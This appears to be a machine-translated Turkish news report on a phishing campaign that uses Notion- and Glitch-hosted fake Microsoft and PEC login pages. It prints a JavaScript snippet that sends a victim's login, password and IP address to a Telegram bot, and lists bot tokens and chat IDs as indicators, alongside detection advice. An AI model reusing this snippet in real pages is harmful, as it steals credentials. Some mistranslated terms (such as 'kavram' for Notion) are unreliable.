Güvenlik analistleri tarafından yapılan yakın tarihli bir soruşturma, İtalyan ve ABD kullanıcılarını hedefleyen kalıcı bir kimlik avı kampanyasını ortaya çıkardı ve kimlik bilgisi hasat ve veri açığa çıkması için ücretsiz bulut platformları ve telgraf botları zinciri kullandı.
Saldırı genellikle Microsoft OneNote veya İtalya’nın PEC (Posta Eleettronica Sertifikası) e -posta sistemi gibi meşru portallar olarak görünen, Notion veya Google Dokümanlar gibi hizmetlerde barındırılan bir kimlik avı sayfası ile başlar.
Mağdurlar, kimlik bilgilerini girmeleri istenen sahte bir giriş sayfasına yol açan bir bağlantıyı tıklamak için e -posta yoluyla çekilir.
.png
)
Gönderildikten sonra, kimlik komut dosyası yalnızca girilen kimlik bilgilerini değil, aynı zamanda kurbanın IP adresini de toplar ve genellikle ipify.org hizmetini kullanır.
Çalınan veriler daha sonra Telegram bot API’si üzerinden, bot jetonları ve kötü amaçlı JavaScript’e sabitlenmiş sohbet kimlikleri ile eklenir.
Veriler gönderildikten sonra, kullanıcılar meşruiyet yanılsamasını koruyarak gerçek Microsoft giriş sayfasına yönlendirilir.
Teknik Sunum Kodu Örnek:
javascript// Capture victim's IP address
fetch('https://api.ipify.org?format=json')
.then(response => response.json())
.then(data => {
let ip = data.ip;
let message = `Login: ${login}\nPassword: ${password}\nIP: ${ip}`;
// Exfiltrate via Telegram bot
fetch(`https://api.telegram.org/bot/sendMessage?chat_id=&text=${encodeURIComponent(message)}`);
});
Yer değiştirmek
Kimlik avı tekniklerinde evrim ve kalıplar
Birden fazla örneğin analizi, kimlik avı temaları ve görsel düzenler değişmiş olsa da – bazen onenote taklit eden, diğer zamanlarda PEC – altında yatan eksfiltrasyon mekanizmasının tutarlı kaldığını ortaya koymaktadır.
Erken varyantlar veri hırsızlığı için basit form gönderimleri kullandı, ancak Şubat 2022’ye kadar saldırganlar, bu teknikler daha sonra terk edilmiş olsa da, zaman zaman iç içe URL kodlama veya Base64 yoluyla gizlenme eklenerek telgraf bot tabanlı eksfiltrasyon üzerinde standartlaştı.
Kampanyanın altyapısı aşağıdakilerle karakterize edilmektedir:
- Kimlik avı içeriğini barındırmak için ücretsiz veya düşük maliyetli bulut hizmetlerinin (kavram, aksaklık, Google Dokümanlar, Renderforest) kullanılması.
- Sadece temel şaşkınlık ve gelişmiş önleme önlemleri olmayan minimal kaçırma teknikleri.
- Telgraf botlarına hazır komut ve kontrol (C2) altyapısı olarak güven.
Tablo: Kimlik avı mekanizmalarının evrimi
| Tarih aralığı | Barındırma zinciri | Eksfiltrasyon yöntemi | Dikkate değer değişiklikler |
|---|---|---|---|
| 29 Ocak 2022 | Notion + Glitch | Form Gönderme | URL kodlaması, telgraf yok |
| 2 Şub 2022 | Notion + Glitch | Telgraf botu | İç içe URL kodlama |
| 23 Ağu 2023 | Notion + Glitch | Telgraf botu | IP Adresi Koleksiyonu Eklendi |
| Temmuz – Aralık 2024 | Google Docs + Backblaze | Telegram Bot (Base64) | Base64 gizlemesi ile denenmiş |
| 7 Nisan 2025 | Notion + Glitch | Telgraf botu | Güncel, aerodinamik, şaşkınlık yok |
Tehdit oyuncusu ve tespit stratejilerinin profili
Bu kampanyanın arkasındaki tehdit oyuncusu, gelişmiş teknik becerilere sahip değil, sadeliği ve sofistike olarak ölçeklenebilirliği destekliyor.
Kampanya, düşük hacimli ancak kalıcıdır, erişim brokering’e odaklanmaya odaklanıyor-diğer siber suçlulara hasat edilmiş kimlik bilgileri sunan-doğrudan sömürüden ziyade.
Temel Teknik Göstergeler:
- Kimlik avı senaryolarında sert kodlanmış telgraf bot jetonları ve sohbet kimlikleri.
- Davranışsal Desen: Notion → Glitch → Telegram API.
- İtalyan dilinin kullanımı ve İtalyan iş alanlarının hedeflenmesi.
Örnek telgraf bot jetonları ve sohbet kimlikleri:
| Bot adı | Kullanıcı adı | Jeton (kısmi) | Sohbet kimliği |
|---|---|---|---|
| Sultana | @Sultannanewbot | 7547274214: aae2… j4wl9se | 6475928726 |
| REMAXX24 | @remaxx24bot | 707231661: aaen… grntzy | 5308217415 |
| Sonuç | @ResultantNewbot | 6717079: Aahug … hnvq_e | 6475928726 |
Tespit önerileri:
- Telegram bot API alanlarına ağ trafiğini izleyin, özellikle kavram veya aksaklık barındıran sayfalara erişim ile birlikte.
- Web trafiğinde sert kodlanmış telgraf bot jetonları için imza tabanlı algılama uygulayın.
- Kimlik avı gösteren alan zincirlerini ve sayfa başlıklarını izleyin (örn., “One Not | Microsoft”, “Aruba | PEC”).
Bu kampanya, saldırganların kolayca erişilebilir bulut altyapısından ve kimlik hırsızlığı için mesajlaşma API’lerinden yararlandığı ve uyanık izleme ve uyarlanabilir savunma stratejileri ihtiyacının altını çizdiği kimlik avı operasyonlarının devam eden evrimini vurgulamaktadır.
Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin!